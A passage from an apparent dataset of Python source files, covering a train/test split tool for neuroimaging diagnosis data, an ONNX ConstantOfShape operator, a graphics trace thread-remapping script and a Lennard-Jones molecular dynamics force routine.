n_test: (float)\n If >= 1 number of subjects to put in the test set.\n If < 1 proportion of subjects to put in the test set.\n :param pval_threshold_ttest: (float) threshold for the t-test on age\n :param t_val_chi2_threshold: (float) threshold for the chi2 test on sex\n :param ignore_demographics: (bool): If True the diagnoses are split without taking into account the demographics\n distributions (age, sex).\n :param logger: Logger object from logging library\n :return:\n train_df (DataFrame) subjects in the train set\n test_df (DataFrame) subjects in the test set\n \"\"\"\n\n if logger is None:\n logger = logging\n logger.basicConfig(level=logging.DEBUG)\n\n diagnosis_baseline_df = baseline_df(diagnosis_df)\n\n if n_test >= 1:\n n_test = int(n_test)\n else:\n n_test = int(n_test * len(diagnosis_baseline_df))\n\n if not ignore_demographics:\n try:\n sex_label = find_label(diagnosis_baseline_df.columns.values, \"sex\")\n age_label = find_label(diagnosis_baseline_df.columns.values, \"age\")\n except ValueError:\n raise ValueError(\"This dataset do not have age or sex values. \"\n \"Please add the flag --ignore_demographics to split \"\n \"without trying to balance age or sex distributions.\")\n\n sex = list(diagnosis_baseline_df[sex_label].values)\n age = list(diagnosis_baseline_df[age_label].values)\n\n idx = np.arange(len(diagnosis_baseline_df))\n\n flag_selection = True\n n_try = 0\n\n while flag_selection:\n idx_test = np.random.choice(idx, size=n_test, replace=False)\n idx_test.sort()\n idx_train = complementary_list(idx, idx_test)\n\n # Find similarity of distribution for the age variable\n if len(set(age)) != 1:\n age_test = [float(age[idx]) for idx in idx_test]\n age_train = [float(age[idx]) for idx in idx_train]\n\n t_age, p_age = ttest_ind(age_test, age_train)\n else:\n p_age = 1\n\n # Find the a similar distribution for the sex variable\n if len(set(sex)) != 1:\n sex_test = [sex_dict[sex[idx]] for idx in idx_test]\n sex_train = [sex_dict[sex[idx]] for idx in idx_train]\n T_sex = chi2(sex_test, sex_train)\n else:\n T_sex = 0\n\n logger.debug(\"p=%.2f, T=%.4f\" % (p_age, T_sex))\n if T_sex < t_val_chi2_threshold and p_age > pval_threshold_ttest:\n flag_selection = False\n test_df = diagnosis_baseline_df.loc[idx_test]\n train_df = diagnosis_baseline_df.loc[idx_train]\n\n n_try += 1\n\n logger.info(\"Split for diagnosis %s was found after %i trials\" % (diagnosis, n_try))\n else:\n idx = np.arange(len(diagnosis_baseline_df))\n idx_test = np.random.choice(idx, size=n_test, replace=False)\n idx_test.sort()\n idx_train = complementary_list(idx, idx_test)\n test_df = diagnosis_baseline_df.loc[idx_test]\n train_df = diagnosis_baseline_df.loc[idx_train]\n\n return train_df, test_df\n\n\ndef split_diagnoses(formatted_data_path,\n n_test=100, subset_name=\"test\", MCI_sub_categories=True,\n t_val_threshold=0.0642, p_val_threshold=0.80,\n ignore_demographics=False, verbose=0):\n \"\"\"\n Performs a single split for each label independently on the subject level.\n The train folder will contain two lists per diagnosis (baseline and longitudinal),\n whereas the test folder will only include the list of baseline sessions.\n\n The age and sex distributions between the two sets must be non-significant (according to T-test and chi-square).\n\n Args:\n formatted_data_path (str): Path to the folder containing data extracted by clinicaaddl tsvtool getlabels.\n n_test (float):\n If > 1, number of subjects to put in set with name 'subset_name'.\n If < 1, proportion of subjects to put in set with name 'subset_name'.\n If 0, no training set is created and the whole dataset is considered as one set with name 'subset_name'.\n subset_name (str): Name of the subset that is complementary to train.\n MCI_sub_categories (bool): If True, manages MCI sub-categories to avoid data leakage.\n t_val_threshold (float): The threshold used for the chi2 test on sex distributions.\n p_val_threshold (float): The threshold used for the T-test on age distributions.\n ignore_demographics (bool): If True the diagnoses are split without taking into account the demographics\n distributions (age, sex).\n verbose (int): level of verbosity.\n\n Returns:\n writes three files per <label>.tsv file present in formatted_data_path:\n - formatted_data_path/train/<label>.tsv\n - formatted_data_path/train/<label>_baseline.tsv\n - formatted_data_path/<subset_name>/<label>_baseline.tsv\n \"\"\"\n logger = return_logger(verbose, \"split\")\n\n # Read files\n results_path = formatted_data_path\n\n train_path = path.join(results_path, 'train')\n if path.exists(train_path):\n shutil.rmtree(train_path)\n if n_test > 0:\n os.makedirs(train_path)\n\n test_path = path.join(results_path, subset_name)\n if path.exists(test_path):\n shutil.rmtree(test_path)\n os.makedirs(test_path)\n\n diagnosis_df_paths = os.listdir(results_path)\n diagnosis_df_paths = [x for x in diagnosis_df_paths if x.endswith('.tsv')]\n diagnosis_df_paths = [x for x in diagnosis_df_paths if not x.endswith('_baseline.tsv')]\n\n MCI_special_treatment = False\n\n if 'MCI.tsv' in diagnosis_df_paths and n_test > 0:\n if MCI_sub_categories:\n diagnosis_df_paths.remove('MCI.tsv')\n MCI_special_treatment = True\n elif 'sMCI.tsv' in diagnosis_df_paths or 'pMCI.tsv' in diagnosis_df_paths:\n logger.warning(\"MCI special treatment was deactivated though MCI subgroups were found.\"\n \"Be aware that it may cause data leakage in transfer learning tasks.\")\n\n # The baseline session must be kept before or we are taking all the sessions to mix them\n for diagnosis_df_path in diagnosis_df_paths:\n diagnosis_df = pd.read_csv(path.join(results_path, diagnosis_df_path),\n sep='\\t')\n interest_columns = diagnosis_df.columns.values\n diagnosis = diagnosis_df_path.split('.')[0]\n logger.info(\"Running split for diagnosis %s\" % diagnosis)\n if n_test > 0:\n train_df, test_df = create_split(diagnosis, diagnosis_df, n_test=n_test,\n t_val_chi2_threshold=t_val_threshold,\n pval_threshold_ttest=p_val_threshold,\n ignore_demographics=ignore_demographics,\n logger=logger)\n # Save baseline splits\n train_df = train_df[interest_columns]\n train_df.to_csv(path.join(train_path, str(diagnosis) + '_baseline.tsv'), sep='\\t', index=False)\n test_df = test_df[interest_columns]\n test_df.to_csv(path.join(test_path, str(diagnosis) + '_baseline.tsv'), sep='\\t', index=False)\n\n # Retrieve all sessions for the training set\n complete_train_df = pd.DataFrame()\n for idx in train_df.index.values:\n subject = train_df.loc[idx, 'participant_id']\n subject_df = diagnosis_df[diagnosis_df.participant_id == subject]\n complete_train_df = pd.concat([complete_train_df, subject_df])\n\n complete_train_df.to_csv(path.join(train_path, str(diagnosis) + '.tsv'), sep='\\t', index=False)\n\n else:\n diagnosis_baseline_df = baseline_df(diagnosis_df)\n test_df = diagnosis_baseline_df[interest_columns]\n test_df.to_csv(path.join(test_path, str(diagnosis) + '_baseline.tsv'), sep='\\t', index=False)\n\n if MCI_special_treatment:\n\n # Extraction of MCI subjects without intersection with the sMCI / pMCI train\n diagnosis_df = pd.read_csv(path.join(results_path, 'MCI.tsv'), sep='\\t')\n MCI_df = diagnosis_df.set_index(['participant_id', 'session_id'])\n baseline_MCI_df = baseline_df(MCI_df, set_index=False)\n supplementary_diagnoses = []\n\n if n_test > 1:\n n_test = int(n_test)\n else:\n n_test = int(n_test * len(baseline_MCI_df))\n\n logger.debug('Before subjects removal for MCI special treatment')\n if n_test > 1:\n n_test = int(n_test)\n else:\n n_test = int(n_test * len(baseline_MCI_df))\n\n sub_df = diagnosis_df.reset_index().groupby('participant_id')['session_id'].nunique()\n logger.debug('%i subjects, %i scans' % (len(sub_df), len(diagnosis_df)))\n\n if 'sMCI.tsv' in diagnosis_df_paths:\n sMCI_baseline_train_df = pd.read_csv(path.join(train_path, 'sMCI_baseline.tsv'), sep='\\t')\n sMCI_baseline_test_df = pd.read_csv(path.join(test_path, 'sMCI_baseline.tsv'), sep='\\t')\n sMCI_baseline_df = pd.concat([sMCI_baseline_train_df, sMCI_baseline_test_df])\n sMCI_baseline_df.reset_index(drop=True, inplace=True)\n for idx in sMCI_baseline_df.index.values:\n subject = sMCI_baseline_df.loc[idx, 'participant_id']\n MCI_df.drop(subject, inplace=True)\n supplementary_diagnoses.append('sMCI')\n\n logger.debug('Removed %i subjects based on sMCI label' % len(sMCI_baseline_df))\n sub_df = MCI_df.reset_index().groupby('participant_id')['session_id'].nunique()\n logger.debug('%i subjects, %i scans' % (len(sub_df), len(MCI_df)))\n\n if 'pMCI.tsv' in diagnosis_df_paths:\n pMCI_baseline_train_df = pd.read_csv(path.join(train_path, 'pMCI_baseline.tsv'), sep='\\t')\n pMCI_baseline_test_df = pd.read_csv(path.join(test_path, 'pMCI_baseline.tsv'), sep='\\t')\n pMCI_baseline_df = pd.concat([pMCI_baseline_train_df, pMCI_baseline_test_df])\n pMCI_baseline_df.reset_index(drop=True, inplace=True)\n for idx in pMCI_baseline_df.index.values:\n subject = pMCI_baseline_df.loc[idx, 'participant_id']\n MCI_df.drop(subject, inplace=True)\n supplementary_diagnoses.append('pMCI')\n\n logger.debug('Removed %i subjects based on pMCI label' % len(pMCI_baseline_df))\n sub_df = MCI_df.reset_index().groupby('participant_id')['session_id'].nunique()\n logger.debug('%i subjects, %i scans' % (len(sub_df), len(MCI_df)))\n\n if len(supplementary_diagnoses) == 0:\n raise ValueError('The MCI_sub_categories flag is not needed as there are no intersections with'\n 'MCI subcategories.')\n\n # Construction of supplementary train\n supplementary_train_df = pd.DataFrame()\n for diagnosis in supplementary_diagnoses:\n sup_baseline_train_df = pd.read_csv(path.join(train_path, diagnosis + '_baseline.tsv'), sep='\\t')\n supplementary_train_df = pd.concat([supplementary_train_df, sup_baseline_train_df])\n sub_df = supplementary_train_df.reset_index().groupby('participant_id')['session_id'].nunique()\n logger.debug('supplementary_train_df %i subjects, %i scans' % (len(sub_df), len(supplementary_train_df)))\n\n supplementary_train_df.reset_index(drop=True, inplace=True)\n\n # MCI selection\n MCI_df.reset_index(inplace=True)\n diagnosis_baseline_df = baseline_df(MCI_df)\n if not ignore_demographics:\n sex_label = find_label(diagnosis_baseline_df.columns.values, \"sex\")\n age_label = find_label(diagnosis_baseline_df.columns.values, \"age\")\n\n sex = list(diagnosis_baseline_df[sex_label].values)\n age = list(diagnosis_baseline_df[age_label].values)\n\n sup_train_sex = list(supplementary_train_df[sex_label].values)\n sup_train_age = list(supplementary_train_df[age_label].values)\n\n sup_train_sex = [sex_dict[x] for x in sup_train_sex]\n sup_train_age = [float(x) for x in sup_train_age]\n\n idx = np.arange(len(diagnosis_baseline_df))\n\n flag_selection = True\n n_try = 0\n\n while flag_selection:\n idx_test = np.random.choice(idx, size=n_test, replace=False)\n idx_test.sort()\n idx_train = complementary_list(idx, idx_test)\n\n # Find similarity of distribution for the age variable\n if len(set(age)) != 1:\n age_test = [float(age[idx]) for idx in idx_test]\n age_train = [float(age[idx]) for idx in idx_train]\n\n t_age, p_age = ttest_ind(age_test, age_train)\n else:\n p_age = 1\n\n # Find similarity of distribution for the sex variable\n if len(set(sex)) != 1:\n sex_test = [sex_dict[sex[idx]] for idx in idx_test]\n sex_train = [sex_dict[sex[idx]] for idx in idx_train]\n T_sex = chi2(sex_test, sex_train)\n else:\n T_sex = 0\n\n logger.debug(\"p=%.2f, T=%.4f\" % (p_age, T_sex))\n if T_sex < t_val_threshold and p_age > p_val_threshold:\n flag_selection = False\n MCI_baseline_test_df = diagnosis_baseline_df.loc[idx_test]\n train_df = diagnosis_baseline_df.loc[idx_train]\n MCI_baseline_train_df = pd.concat([train_df, supplementary_train_df])\n logger.debug('Supplementary train df %i' % len(supplementary_train_df))\n MCI_baseline_train_df.reset_index(drop=True, inplace=True)\n\n n_try += 1\n\n logger.info('Split for diagnosis MCI was found after %i trials' % n_try)\n else:\n idx = np.arange(len(diagnosis_baseline_df))\n idx_test = np.random.choice(idx, size=n_test, replace=False)\n idx_test.sort()\n idx_train = complementary_list(idx, idx_test)\n\n MCI_baseline_test_df = diagnosis_baseline_df.loc[idx_test]\n train_df = diagnosis_baseline_df.loc[idx_train]\n MCI_baseline_train_df = pd.concat([train_df, supplementary_train_df])\n MCI_baseline_train_df.reset_index(drop=True, inplace=True)\n\n # Write selection of MCI\n MCI_baseline_train_df = MCI_baseline_train_df[interest_columns]\n MCI_baseline_train_df.to_csv(path.join(train_path, 'MCI_baseline.tsv'), sep='\\t', index=False)\n MCI_baseline_test_df = MCI_baseline_test_df[interest_columns]\n MCI_baseline_test_df.to_csv(path.join(test_path, 'MCI_baseline.tsv'), sep='\\t', index=False)\n\n # Retrieve all sessions for the training set\n MCI_complete_train_df = pd.DataFrame()\n for idx in MCI_baseline_train_df.index.values:\n subject = MCI_baseline_train_df.loc[idx, 'participant_id']\n subject_df = diagnosis_df[diagnosis_df.participant_id == subject]\n MCI_complete_train_df = pd.concat([MCI_complete_train_df, subject_df])\n\n MCI_complete_train_df.to_csv(path.join(train_path, 'MCI.tsv'), sep='\\t', index=False)\n"} {"ext": "py", "sha": "1a30d8d4aef7461996b7aa5e1b8ebbc7e1a661b6", "content": "# -*- encoding: utf-8 -*-\n# pylint: disable=E0203,E1101,C0111\n\"\"\"\n@file\n@brief Runtime operator.\n\"\"\"\nimport numpy\nfrom ._op import OpRun\n\n\nclass ConstantOfShape(OpRun):\n\n atts = {'value': numpy.array([0], dtype=numpy.float32)}\n\n def __init__(self, onnx_node, desc=None, **options):\n OpRun.__init__(self, onnx_node, desc=desc,\n expected_attributes=ConstantOfShape.atts,\n **options)\n self.cst = (self.value[0]\n if isinstance(self.value, numpy.ndarray)\n else self.value)\n if not isinstance(self.cst, (float, numpy.float32, numpy.float64)):\n raise TypeError(\"cst must be a real not {}\".format(type(self.cst)))\n\n def _run(self, data): # pylint: disable=W0221\n res = numpy.full(tuple(data), self.cst)\n return (res, )\n"} {"ext": "py", "sha": "1a30db0846b18c8770feddae9c5305158d14ef18", "content": "#!/usr/bin/env python3\nimport argparse\nimport json\nimport os\nfrom patrace import (\n InputFile,\n OutputFile,\n Call,\n CreateInt32Value,\n)\n\n\nclass Arg:\n def __init__(self, type, name, value):\n self.type = type\n self.name = name\n self.value = value\n\n def get(self):\n arg = self.type(self.value)\n if self.name:\n arg.mName = self.name\n return arg\n\n\nclass Function:\n def __init__(self, name, args):\n self.name = name\n self.args = args\n\n def write(self, output, tid):\n call = Call(self.name)\n call.thread_id = tid\n\n for arg in self.args[1:]:\n call.args.push_back(arg.get())\n\n call.return_value = self.args[0].get()\n\n output.WriteCall(call)\n\n\nclass Remapper:\n def __init__(self):\n self.num_calls_remapped = 0\n\n def run(self, input, output):\n # Modify header, if we are remaping the default tid\n header = json.loads(input.jsonHeader)\n default_tid = header['defaultTid']\n output.jsonHeader = json.dumps(header)\n\n print('Searching for relevant calls...')\n call_lists = {\n 'eglMakeCurrent': [],\n 'eglCreateContext': [],\n 'eglDestroyContext': [],\n }\n\n context_calls = []\n highest_thread_id = -1\n for call in input.Calls():\n highest_thread_id = max(call.thread_id, highest_thread_id)\n # call_list = call_lists.get(call.name, None)\n if call.name in list(call_lists.keys()):\n context_calls.append({\n 'name': call.name,\n 'tid': call.thread_id,\n 'params': call.GetArgumentsDict().copy(),\n 'retval': call.GetReturnValue(),\n 'number': call.number,\n })\n # if call_list is not None:\n # call_list.append({\n # 'call_name': call.name,\n # 'tid': call.thread_id,\n # 'params': call.GetArgumentsDict(),\n # 'retval': call.GetReturnValue(),\n # 'number': call.number,\n # })\n num_threads = highest_thread_id + 1\n\n print(\"Renumbering context ids...\")\n # Sometimes, contexts can get the same pointer values\n # Hence, the contexts pointers will not be unique. Therefor,\n # we create an unique, sequential id.\n context_sequential_id = 1\n # Maps original context id with sequential context id.\n contexts_idmap = {0: 0}\n for call in context_calls:\n if call['name'] == 'eglCreateContext':\n contexts_idmap[call['retval']] = context_sequential_id\n call['retval'] = context_sequential_id\n context_sequential_id += 1\n elif call['name'] == 'eglDestroyContext':\n old_id = call['params']['ctx']\n seq_id = contexts_idmap[old_id]\n del contexts_idmap[old_id]\n call['params']['ctx'] = seq_id\n elif call['name'] == 'eglMakeCurrent':\n # Change ctx parameter to our new sequential id\n call['params']['ctx'] = contexts_idmap[call['params']['ctx']]\n\n print(\"Finding relevant context and surfaces...\")\n make_current_args = [\n (call['params']['draw'], call['params']['ctx'])\n for call in context_calls\n if (\n call['name'] == 'eglMakeCurrent'\n # Excluding the following test made things work for GunJack\n # call['tid'] in [default_tid, 0]\n )\n ]\n\n import pprint\n pprint.pprint(make_current_args)\n\n surfaces = []\n contexts = []\n\n for draw, ctx in make_current_args:\n if draw:\n surfaces.append(draw)\n\n if ctx:\n contexts.append(ctx)\n\n # Find all relevant shared contexts\n shared_contexts = []\n\n for context in contexts:\n for context_call in context_calls:\n if context_call['name'] != 'eglCreateContext':\n continue\n\n if context_call['retval'] == context:\n shared_contexts.append(context_call['params']['share_context'])\n\n for share_context in shared_contexts:\n contexts.append(share_context)\n\n contexts = set(contexts)\n surfaces = set(surfaces)\n print(\"Surfaces {}\".format(surfaces))\n print(\"Contexts: {}\".format(contexts))\n\n class Thread:\n def __init__(self):\n self.current_ctx_seq = 0\n self.current_ctx_old = 0\n self.remap = 0\n\n threads = [Thread() for i in range(num_threads)]\n # Used to indicate if inside a relevant \"eglMakeCurrent-block\"\n\n print(\"Remap calls...\")\n\n contextid_to_use = None\n\n contexts_idmap = {0: 0}\n context_sequential_id = 1\n active_thread = -1\n for call in input.Calls():\n current_thread = call.thread_id\n thread_switch = False\n if active_thread != current_thread:\n thread_switch = True\n active_thread = current_thread\n\n if call.name == 'eglCreateContext':\n oldid = call.GetReturnValue()\n contexts_idmap[oldid] = context_sequential_id\n if context_sequential_id in contexts:\n contextid_to_use = oldid\n print(\"We will map all calls of the context:\", contextid_to_use)\n self.remap(call, default_tid)\n context_sequential_id += 1\n elif call.name == 'eglDestroyContext':\n ad = call.GetArgumentsDict()\n oldid = ad['ctx']\n # seqid = contexts_idmap[oldid]\n del contexts_idmap[oldid]\n elif (\n call.name.startswith('eglCreateWindowSurface') or\n call.name == 'eglCreatePbufferSurface'\n ):\n if call.GetReturnValue() in surfaces:\n self.remap(call, default_tid)\n elif call.name == 'eglDestroySurface':\n ad = call.GetArgumentsDict()\n if ad['surface'] in surfaces:\n self.remap(call, default_tid)\n elif call.name == 'eglMakeCurrent':\n t = threads[call.thread_id]\n ad = call.GetArgumentsDict()\n t.current_dpy = ad['dpy']\n t.current_draw = ad['draw']\n t.current_read = ad['read']\n t.current_ctx_old = ad['ctx']\n t.current_ctx_seq = contexts_idmap[ad['ctx']]\n\n if t.current_ctx_seq in contexts:\n # call.SetArgument(3, contextid_to_use)\n t.remap = True\n\n if ad['ctx'] == 0:\n t.remap = False\n\n if threads[call.thread_id].remap:\n # If a context is already active on the default thread\n # We need to inject an eglMakeCurrent the first time\n if thread_switch and call.name != 'eglMakeCurrent':\n t = threads[call.thread_id]\n Function(\n 'eglMakeCurrent', [\n Arg(CreateInt32Value, '', 1),\n Arg(CreateInt32Value, 'dpy', t.current_dpy),\n Arg(CreateInt32Value, 'draw', t.current_draw),\n Arg(CreateInt32Value, 'read', t.current_read),\n Arg(CreateInt32Value, 'ctx', t.current_ctx_old),\n ]\n ).write(output, default_tid)\n\n self.remap(call, default_tid)\n\n output.WriteCall(call)\n\n def remap(self, call, newtid):\n call.thread_id = newtid\n self.num_calls_remapped += 1\n\n\ndef remap(oldfile, newfile):\n remapper = Remapper()\n\n if not os.path.exists(oldfile):\n print(\"File does not exists: {}\".format(oldfile))\n return\n\n with InputFile(oldfile) as input:\n with OutputFile(newfile) as output:\n remapper.run(input, output)\n\n return remapper.num_calls_remapped\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Automatically remap thread ids in a .pat trace. This should be used if an eglContext is used by more threads than the default thread.')\n parser.add_argument('oldfile', help='Path to the .pat trace file')\n parser.add_argument('newfile', help='New .pat file to create')\n\n args = parser.parse_args()\n num = remap(args.oldfile, args.newfile)\n\n print(\"Number of calls remapped {num}\".format(num=num))\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a30de5d5fd395c60bbbcfe468f5f8bb2ea0c880", "content": "#!/usr/bin/env python3\n# md_lj_ll_module.py\n\n#------------------------------------------------------------------------------------------------#\n# This software was written in 2016/17 #\n# by Michael P. Allen <m.p.allen@warwick.ac.uk>/<m.p.allen@bristol.ac.uk> #\n# and Dominic J. Tildesley <d.tildesley7@gmail.com> (\"the authors\"), #\n# to accompany the book \"Computer Simulation of Liquids\", second edition, 2017 (\"the text\"), #\n# published by Oxford University Press (\"the publishers\"). #\n# #\n# LICENCE #\n# Creative Commons CC0 Public Domain Dedication. #\n# To the extent possible under law, the authors have dedicated all copyright and related #\n# and neighboring rights to this software to the PUBLIC domain worldwide. #\n# This software is distributed without any warranty. #\n# You should have received a copy of the CC0 Public Domain Dedication along with this software. #\n# If not, see <http://creativecommons.org/publicdomain/zero/1.0/>. #\n# #\n# DISCLAIMER #\n# The authors and publishers make no warranties about the software, and disclaim liability #\n# for all uses of the software, to the fullest extent permitted by applicable law. #\n# The authors and publishers do not recommend use of this software for any purpose. #\n# It is made freely available, solely to clarify points made in the text. When using or citing #\n# the software, you should not imply endorsement by the authors or publishers. #\n#------------------------------------------------------------------------------------------------#\n\n\"\"\"Force routine for MD simulation, LJ atoms, using neighbour lists.\"\"\"\n\nfast = True # Change this to replace NumPy force evaluation with slower Python\n\nclass PotentialType:\n \"\"\"A composite variable for interactions.\"\"\"\n\n def __init__(self, cut, pot, vir, lap, ovr):\n self.cut = cut # the potential energy cut (but not shifted) at r_cut\n self.pot = pot # the potential energy cut-and-shifted at r_cut\n self.vir = vir # the virial\n self.lap = lap # the Laplacian\n self.ovr = ovr # a flag indicating overlap (i.e. pot too high to use)\n\n def __add__(self, other):\n cut = self.cut + other.cut\n pot = self.pot + other.pot\n vir = self.vir + other.vir\n lap = self.lap + other.lap\n ovr = self.ovr or other.ovr\n\n return PotentialType(cut,pot,vir,lap,ovr)\n\ndef introduction():\n \"\"\"Prints out introductory statements at start of run.\"\"\"\n \n print('Lennard-Jones potential')\n print('Cut-and-shifted version for dynamics')\n print('Cut (but not shifted) version also calculated')\n print('Diameter, sigma = 1')\n print('Well depth, epsilon = 1')\n if fast:\n print('Fast NumPy force routine')\n else:\n print('Slow Python force routine')\n print('Uses neighbour lists')\n\ndef conclusion():\n \"\"\"Prints out concluding statements at end of run.\"\"\"\n\n print('Program ends')\n\ndef force ( box, r_cut, r ):\n \"\"\"Takes in box, cutoff range, and coordinate array, and calculates forces and potentials etc.\"\"\"\n\n import numpy as np\n from itertools import product\n import math\n \n # It is assumed that positions are in units where box = 1\n # Forces are calculated in units where sigma = 1 and epsilon = 1\n # Uses neighbour lists\n\n n = r.shape[0]\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 cells in cubic lattice\n # The cells are chosen so that if (d0,d1,d2) appears, then (-d0,-d1,-d2) does not.\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 1, 0], [-1, 1, 0],\n [ 0, 1, 0], [ 0, 0, 1], [-1, 0, 1], [ 1, 0, 1], [-1,-1, 1],\n [ 0,-1, 1], [ 1,-1, 1], [-1, 1, 1], [ 0, 1, 1], [ 1, 1, 1] ] )\n\n r = r - np.rint(r) # Ensure all atoms in periodic box\n \n sr2_ovr = 1.77 # Overlap threshold (pot > 100)\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n # Calculate potential at cutoff\n sr2 = 1.0 / r_cut**2 # in sigma=1 units\n sr6 = sr2 ** 3\n sr12 = sr6 **2\n pot_cut = sr12 - sr6 # Without numerical factor 4\n\n # Initialize\n f = np.zeros_like(r)\n total = PotentialType ( cut=0.0, pot=0.0, vir=0.0, lap=0.0, ovr=False )\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, define a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n fc.append(np.zeros_like(rc[-1])) # Zero corresponding forces, add to list\n\n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n if rci.size==0: # Handle empty cell\n continue\n\n for dj in d: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i==j when i-cell==j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = np.where ( in_range, 1.0/rij_sq, 0.0 ) # (sigma/rij)**2, only if in range\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n cut = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = cut + sr12 # LJ virial\n pot = np.where ( in_range, cut-pot_cut, 0.0 ) # LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = vir * sr2 # LJ scalar part of forces\n fij = rij * fij[:,:,np.newaxis] # LJ pair forces\n\n if ci1==cj1: # Correct for double-counting ij and ji when i-cell==j-cell\n fij = fij / 2\n total = total + PotentialType ( cut=np.sum(cut)/2, pot=np.sum(pot)/2,\n vir=np.sum(vir)/2, lap=np.sum(lap)/2, ovr=np.any(ovr) )\n else:\n total = total + PotentialType ( cut=np.sum(cut), pot=np.sum(pot),\n vir=np.sum(vir), lap=np.sum(lap), ovr=np.any(ovr) )\n\n fc[ci1][:,:] = fc[ci1][:,:] + np.sum(fij,axis=1) # Aggregate force on atoms in i-cell\n fc[cj1][:,:] = fc[cj1][:,:] - np.sum(fij,axis=0) # Aggregate force on atoms in j-cell\n\n # Copy forces from list of cell arrays to main force array\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n ci1 = np.ravel_multi_index(ci,(sc,sc,sc),mode='wrap') # Single-index\n f[mask,:] = fc[ci1] # Copy atom forces from correct cell\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # Initially empty list of indices\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n for dj in d: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where j-cell==i-cell and i is last atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = r[ki,:]-r[kj,:] # Separation vector\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq: # Check within cutoff\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = 1.0 / rij_sq # (sigma/rij)**2\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n cut = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = cut + sr12 # LJ virial\n pot = cut - pot_cut # LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = rij * vir * sr2 # LJ forces\n total = total + PotentialType ( cut=cut, pot=pot, vir=vir, lap=lap, ovr=ovr )\n f[ki,:] = f[ki,:] + fij\n f[kj,:] = f[kj,:] - fij\n\n # Multiply results by numerical factors\n f = f * 24.0 # 24*epsilon\n total.cut = total.cut * 4.0 # 4*epsilon\n total.pot = total.pot * 4.0 # 4*epsilon\n total.vir = total.vir * 24.0 / 3.0 # 24*epsilon and divide virial by 3\n total.lap = total.lap * 24.0 * 2.0 # 24*epsilon and factor 2 for ij and ji\n \n return total, f\n\n\ndef hessian ( box, r_cut, r, f ):\n \"\"\"Calculates Hessian function (for 1/N correction to config temp).\"\"\"\n\n import numpy as np\n from itertools import product\n import math\n\n # This routine is only needed in a constant-energy ensemble\n # It is assumed that positions are in units where box = 1\n # but the result is given in units where sigma = 1 and epsilon = 1\n # It is assumed that forces have already been calculated in array f\n # Uses neighbour lists\n\n n = r.shape[0]\n assert np.all ( r.shape==f.shape ), 'Dimension mismatch in hessian'\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 cells in cubic lattice\n # The cells are chosen so that if (d1,d2,d3) appears, then (-d1,-d2,-d3) does not.\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 1, 0], [-1, 1, 0],\n [ 0, 1, 0], [ 0, 0, 1], [-1, 0, 1], [ 1, 0, 1], [-1,-1, 1],\n [ 0,-1, 1], [ 1,-1, 1], 